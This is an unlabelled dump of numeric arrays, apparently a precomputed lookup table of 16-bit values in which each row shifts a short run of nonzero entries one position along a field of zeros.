[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 12676, 6209, 55270, 5382, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 11008, 33472, 47792, 7212, 16427, 40760],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 39044, 12097, 17638, 37382, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 46336, 1344, 2896, 65108, 22555],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 65412, 17985, 45542, 3846, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 61696, 58432, 59152, 14916, 54257, 41338],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 26244, 23873, 7910, 35846, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 4608, 5248, 33056, 14664, 56082, 23557],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 52612, 29761, 35814, 2310, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 1792, 39360, 51312, 28060, 56071, 33324],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 13444, 35649, 63718, 34310, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 5632, 62848, 41312, 6943],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 39812, 41537, 26086, 774, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 60672, 832, 63184, 23604, 36589, 59854],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 644, 47425, 53990, 32774, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 48640, 24448, 15328, 24056, 26814, 34793],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 27012, 53313, 16358, 64774, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 8960, 32960, 18992, 64524, 48419, 23776],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 53380, 59201, 44262, 31238, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 2816, 43712, 8368, 27820, 41187],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 14212, 65089, 6630, 63238, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 10496, 29248, 55952, 4900, 10025, 23522],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 40580, 5441, 34534, 29702, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 43520, 14976, 23200, 64424, 60586, 4237],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 1412, 11329, 62438, 61702, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 32512, 14272, 65520, 46972, 57983, 33620],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 27780, 17217, 24806, 28166, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 52736, 33664, 15584, 3128, 52583],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 54148, 23105, 52710, 60166, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 42240, 12608, 21072, 53012, 47269, 43958],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 14980, 28993, 15078, 26630, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 54784, 42368, 40288, 16984, 45782, 47601],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 41348, 34881, 42982, 58630, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 6912, 48832, 43440, 36844, 34587, 2440],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 2180, 40769, 5350, 25094, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 41216, 24640, 64016, 27652, 17579],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 28548, 46657, 33254, 57094, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 24832, 16448, 7696, 4, 40801, 19786],
